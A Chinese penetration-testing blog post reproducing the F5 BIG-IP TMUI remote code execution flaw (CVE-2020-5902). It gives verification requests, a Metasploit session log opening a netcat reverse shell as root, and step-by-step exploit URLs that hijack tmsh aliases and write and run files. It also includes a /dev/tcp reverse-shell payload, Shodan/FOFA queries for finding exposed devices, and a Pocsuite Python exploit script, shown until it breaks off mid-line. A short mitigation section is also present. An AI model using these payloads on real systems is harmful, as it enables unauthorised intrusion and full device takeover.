<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/128x128.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="F5 BIG-IP远程代码执行（CVE-2020-5902）简介 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。  影响版本  BIG-IP = 15.1.0 BIG-IP = 15.0.0 BIG-">
<meta property="og:type" content="article">
<meta property="og:title" content="F5 BIG-IP远程代码执行（CVE-2020-5902）">
<meta property="og:url" content="http://laker.xyz/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/index.html">
<meta property="og:site_name" content="laker&#39;s Blog">
<meta property="og:description" content="F5 BIG-IP远程代码执行（CVE-2020-5902）简介 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。  影响版本  BIG-IP = 15.1.0 BIG-IP = 15.0.0 BIG-">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706140114858.png">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706140700516.png">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706141205082.png">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706142008183.png">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706143008036.png">
<meta property="og:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706143115741.png">
<meta property="og:updated_time" content="2020-07-10T08:40:13.894Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="F5 BIG-IP远程代码执行（CVE-2020-5902）">
<meta name="twitter:description" content="F5 BIG-IP远程代码执行（CVE-2020-5902）简介 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。  影响版本  BIG-IP = 15.1.0 BIG-IP = 15.0.0 BIG-">
<meta name="twitter:image" content="http://laker.xyz/2020/07/10/F5%20BIG-IP远程代码执行（CVE-2020-5902）/image-20200706140114858.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://laker.xyz/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/">





  <title>F5 BIG-IP远程代码执行（CVE-2020-5902） | laker's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">laker's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录渗透测试琐事仅仅</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://laker.xyz/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="laker">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="laker's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">F5 BIG-IP远程代码执行（CVE-2020-5902）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-07-10T16:37:06+08:00">
                2020-07-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="F5-BIG-IP远程代码执行（CVE-2020-5902）"><a href="#F5-BIG-IP远程代码执行（CVE-2020-5902）" class="headerlink" title="F5 BIG-IP远程代码执行（CVE-2020-5902）"></a>F5 BIG-IP远程代码执行（CVE-2020-5902）</h4><h4 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h4><blockquote>
<p><code>F5 BIG-IP</code> 是美国<code>F5</code>公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。</p>
<p>在 <code>F5 BIG-IP</code> 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。</p>
</blockquote>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><blockquote>
<ul>
<li>BIG-IP = 15.1.0</li>
<li>BIG-IP = 15.0.0</li>
<li>BIG-IP 14.1.0 - 14.1.2</li>
<li>BIG-IP 13.1.0 - 13.1.3</li>
<li>BIG-IP 12.1.0 - 12.1.5</li>
<li>BIG-IP 11.6.1 - 11.6.5</li>
</ul>
</blockquote>
<h4 id="漏洞简析"><a href="#漏洞简析" class="headerlink" title="漏洞简析"></a>漏洞简析</h4><blockquote>
<p>未授权的远程攻击者通过向漏洞页面发送特制的请求包，可以造成任意 Java 代码执行。进而控制 <code>F5 BIG-IP</code> 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响，不影响数据面板。</p>
</blockquote>
<h4 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h4><p>存在漏洞的站点验证POC:</p>
<blockquote>
<p>GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp  </p>
<p>GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse</p>
</blockquote>
<p>若页面状态码200则判定存在Tomcat路径穿越+权限绕过问题。</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706140114858.png" alt="image-20200706140114858"></p>
<p>利用方式1：</p>
<p><strong>目前msf已经集成了该漏洞的利用</strong>，使用metasploit导入<a href="https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb即可使用。" target="_blank" rel="noopener">https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb即可使用。</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(linux/http/f5_bigip_tmui_rce) &gt; run</span><br><span class="line"></span><br><span class="line">[+] nc *** 4444 -e /bin/sh</span><br><span class="line">[*] Started reverse TCP handler on ***:4444</span><br><span class="line">[*] Executing automatic check (disable AutoCheck to override)</span><br><span class="line">[+] The target is vulnerable. Target is running BIG-IP 14.1.2.</span><br><span class="line">[*] Creating alias list=bash</span><br><span class="line">[+] Successfully created alias list=bash</span><br><span class="line">[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping</span><br><span class="line">[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh</span><br><span class="line">[*] Uploading /tmp/VWqLg1NHgUmhRzahFjCKCMapWH</span><br><span class="line">[+] Successfully uploaded /tmp/VWqLg1NHgUmhRzahFjCKCMapWH</span><br><span class="line">[*] Executing /tmp/VWqLg1NHgUmhRzahFjCKCMapWH</span><br><span class="line">[*] Deleting alias list=bash</span><br><span class="line">[+] Successfully deleted alias list=bash</span><br><span class="line">[*] Command shell session 1 opened (172.16.249.1:4444 -&gt; 172.16.249.176:41324) at 2020-07-05 15:17:11 -0500</span><br><span class="line">[+] Deleted /tmp/VWqLg1NHgUmhRzahFjCKCMapWH</span><br><span class="line"></span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0</span><br><span class="line">uname -a</span><br></pre></td></tr></table></figure>

<p>同理，根据原文的Ruby脚本，可剥离出需要的HTTP请求：</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706140700516.png" alt="image-20200706140700516"></p>
<p>剥离得到漏洞利用Exp:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># 1.修改alias劫持list命令为bash</span><br><span class="line">https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash</span><br><span class="line"></span><br><span class="line"># 2.写入bash文件</span><br><span class="line">https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&amp;content=id</span><br><span class="line"></span><br><span class="line"># 3. 执行bash文件</span><br><span class="line">https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/1.txt</span><br><span class="line"></span><br><span class="line"># 4.还原list命令</span><br><span class="line">https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list</span><br><span class="line"></span><br><span class="line">PS:第四步可不还原，第二步的执行情况（写入情况）可使用如下请求进行读取</span><br><span class="line">读取</span><br><span class="line">https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/1.txt</span><br></pre></td></tr></table></figure>

<p>执行成功截图：</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706141205082.png" alt="image-20200706141205082"></p>
<p>PS:即使漏洞存在也可能需要多次执行才能成功（4次左右）。</p>
<p>同时可用反弹shell(将第二步的Payload换为<strong>/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&amp;content=bash+-i+&gt;%26+/dev/tcp/ip/port+0+&gt;=%26+1</strong>)</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706142008183.png" alt="image-20200706142008183"></p>
<h4 id="痕迹分析"><a href="#痕迹分析" class="headerlink" title="痕迹分析"></a>痕迹分析</h4><p>在WEB日志下将存在访问：<strong>..;/tmui/locallb/workspace/fileSave.jsp</strong>文件的痕迹，若使用了GET请求还能看到其执行的命令</p>
<h4 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h4><blockquote>
<p>Zoomeye:app:”F5 BIG-IP load balancer httpd”</p>
<p>FOFA：app=”F5-BIGIP”</p>
<p>Shodan： http.title:”BIG-IP&reg;- Redirect”</p>
</blockquote>
<p>全球分布：</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706143008036.png" alt="image-20200706143008036"></p>
<p>国内分布：</p>
<p><img src="/2020/07/10/F5 BIG-IP远程代码执行（CVE-2020-5902）/image-20200706143115741.png" alt="image-20200706143115741"></p>
<h4 id="防护方案"><a href="#防护方案" class="headerlink" title="防护方案"></a>防护方案</h4><ol>
<li>登陆 TMOS Shell（<strong>tmsh</strong>）执行：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tmsh</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>修改 httpd 配置信息：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">edit /sys httpd all-properties</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>找到<code>include</code> 部分并添加以下内容：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">include &apos;</span><br><span class="line">&lt;LocationMatch &quot;.*\.\.;.*&quot;&gt;</span><br><span class="line">Redirect 404 /</span><br><span class="line">&lt;/LocationMatch&gt;</span><br><span class="line">&apos;</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>通过输入以下命令，将更改写入并保存到配置文件中：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Esc</span><br><span class="line">:wq!</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>通过输入以下命令来保存配置：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">save /sys config</span><br></pre></td></tr></table></figure>

<ol start="6">
<li>通过输入以下命令来重新启动<strong>httpd</strong>服务：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">restart sys service httpd</span><br></pre></td></tr></table></figure>

<p>也可以通过升级的方式来进行修复：</p>
<ul>
<li>BIG-IP 15.x 升级至 15.1.0.4</li>
<li>BIG-IP 14.x 升级至 14.1.2.6</li>
<li>BIG-IP 13.x 升级至 13.1.3.4</li>
<li>BIG-IP 12.x 升级至 12.1.5.2</li>
<li>BIG-IP 11.x 升级至 11.6.5.2</li>
</ul>
<h4 id="POC-基于Pocsuite"><a href="#POC-基于Pocsuite" class="headerlink" title="POC(基于Pocsuite)"></a>POC(基于Pocsuite)</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> urlparse</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pocsuite3.api <span class="keyword">import</span> Output, POCBase, register_poc, requests, logger, CEye</span><br><span class="line"><span class="keyword">from</span> pocsuite3.lib.utils <span class="keyword">import</span> random_str</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DemoPOC</span><span class="params">(POCBase)</span>:</span></span><br><span class="line">    vulID = <span class="string">''</span>  <span class="comment"># ssvid</span></span><br><span class="line">    version = <span class="string">'3.0'</span></span><br><span class="line">    author = [<span class="string">'d4m1ts'</span>]</span><br><span class="line">    vulDate = <span class="string">'2020-07-06'</span></span><br><span class="line">    createDate = <span class="string">'2020-07-06'</span></span><br><span class="line">    updateDate = <span class="string">'2020-07-06'</span></span><br><span class="line">    references = [<span class="string">'https://github.com/jas502n/CVE-2020-5902'</span>,<span class="string">'https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb'</span>]</span><br><span class="line">    name = <span class="string">'F5 BIG-IP RCE（CVE-2020-5902）'</span></span><br><span class="line">    appPowerLink = <span class="string">''</span></span><br><span class="line">    appName = <span class="string">'F5 BIG-IP'</span></span><br><span class="line">    appVersion = <span class="string">'15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1'</span></span><br><span class="line">    vulType = <span class="string">'Command Execution'</span></span><br><span class="line">    desc = <span class="string">'''In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    cnnvd = <span class="string">""</span></span><br><span class="line">    cnvd = <span class="string">""</span></span><br><span class="line">    cve = <span class="string">"CVE-2020-5902"</span></span><br><span class="line">    cvss3 = <span class="string">""</span></span><br><span class="line">    harm = <span class="string">"命令执行"</span></span><br><span class="line">    level = <span class="string">"high"</span></span><br><span class="line">    sug = <span class="string">'''升级'''</span></span><br><span class="line">    vul_type = <span class="string">"web"</span></span><br><span class="line">    pocname = <span class="string">"f5_big_ip_rce_cve_2020_5902"</span></span><br><span class="line">    samples = []</span><br><span class="line">    install_requires = [<span class="string">''</span>]</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_verify</span><span class="params">(self)</span>:</span></span><br><span class="line">        result = &#123;&#125;</span><br><span class="line">        randstr = random_str()</span><br><span class="line">        protocol,host,port,rpath = self.parse_url(self.url)</span><br><span class="line">        url = protocol + <span class="string">"://"</span> + str(host) + <span class="string">":"</span> + str(port)</span><br><span class="line"></span><br><span class="line">        fileName = <span class="string">"/var/tmp/tdfgjkl"</span>   <span class="comment"># 写到目标的</span></span><br><span class="line">        cmd = <span class="string">"id"</span>   <span class="comment"># // ==&gt; \/\/</span></span><br><span class="line"></span><br><span class="line">        headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>&#125;</span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">create_alias</span><span class="params">()</span>:</span> <span class="comment"># 开启bash</span></span><br><span class="line">            payload = <span class="string">"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"</span></span><br><span class="line">            headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>, <span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>&#125;</span><br><span class="line">            data=&#123;<span class="string">"command"</span>: <span class="string">"create cli alias private list command bash"</span>&#125;</span><br><span class="line">            req = requests.post(url+payload, headers=headers, data=data)</span><br><span class="line">            <span class="keyword">if</span> req.json()[<span class="string">'error'</span>] == <span class="string">""</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">upload_script</span><span class="params">(fileName,cmd)</span>:</span>    <span class="comment"># fileName ==&gt; /tmp/ljkkasdv    任意文件上传</span></span><br><span class="line">            payload = <span class="string">"/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"</span></span><br><span class="line">            headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>, <span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>&#125;</span><br><span class="line">            data=&#123;<span class="string">"fileName"</span>: fileName, <span class="string">"content"</span>: cmd&#125;</span><br><span class="line">            req = requests.post(url+payload, headers=headers, data=data)</span><br><span class="line">            <span class="keyword">if</span> req.status_code == <span class="number">200</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">upload_check</span><span class="params">(fileName,cmd)</span>:</span> <span class="comment"># 任意文件读取</span></span><br><span class="line">            payload = <span class="string">"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=&#123;&#125;"</span>.format(fileName)</span><br><span class="line">            headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>&#125;</span><br><span class="line">            req = requests.get(url+payload, headers=headers)</span><br><span class="line">            <span class="keyword">if</span> cmd.replace(<span class="string">"/"</span>,<span class="string">"\\/"</span>) <span class="keyword">in</span> req.text:</span><br><span class="line">                logger.info(<span class="string">"[+] Upload Success ! ==&gt; &#123;&#125;"</span>.format(url+payload))</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">execute_script</span><span class="params">(fileName)</span>:</span>   <span class="comment"># if "uid" in</span></span><br><span class="line">            payload = <span class="string">"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"</span></span><br><span class="line">            headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>, <span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>&#125;</span><br><span class="line">            data=&#123;<span class="string">"command"</span>: <span class="string">"list &#123;&#125;"</span>.format(fileName)&#125;</span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):   <span class="comment"># 重复多次可能会成功，一般是4次</span></span><br><span class="line">                req = requests.post(url+payload, headers=headers, data=data)</span><br><span class="line">                <span class="keyword">if</span> req.json()[<span class="string">'error'</span>] == <span class="string">""</span> <span class="keyword">and</span> <span class="string">"uid"</span> <span class="keyword">in</span> req.text:</span><br><span class="line">                    <span class="keyword">print</span> 